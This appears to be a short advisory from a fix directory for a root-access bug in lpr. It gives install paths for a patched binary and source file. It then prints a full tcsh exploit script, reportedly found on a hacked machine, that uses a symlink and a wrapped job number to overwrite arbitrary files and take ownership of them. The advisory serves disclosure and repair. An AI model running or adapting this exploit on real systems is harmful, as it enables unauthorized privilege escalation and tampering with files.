ALL current versions of lpr on all distributions have a bug
that can give a regular user root access very easily.

The file "lpr" in this fix directory has this bug fixed, and
should be copied to /usr/bin/lpr (owned by root, group lp, mode 6755)

The file "lpr.c" is the patched source file, that should be copied
to /usr/src/usr.sbin/lpd-5.12/lpr/lpr.c.

The following is a script demonstrating the hole that was found on a 
hacked machine.
--------------------------------------------------------------------
#!/bin/tcsh -f
#
# Usage: lcp from-file to-file
#

if ($#argv != 2) then
        echo Usage: lcp from-file to-file
        exit 1
endif

# This link stuff allows us to overwrite unreadable files,
# should we want to.
echo x > /tmp/.tmp.$$
lpr -q -s /tmp/.tmp.$$
rm -f /tmp/.tmp.$$              # lpr's accepted it, point it
ln -s $2 /tmp/.tmp.$$           # to where we really want

@ s = 0
while ( $s != 999)              # loop 999 times
        lpr /nofile >&/dev/null # spin the job number till it wraps!
        @ s++
        if ( $s % 10 == 0 ) echo -n .
end
lpr $1                          # write source file over old data file
                                # user becomes owner
rm -f /tmp/.tmp.$$
exit 0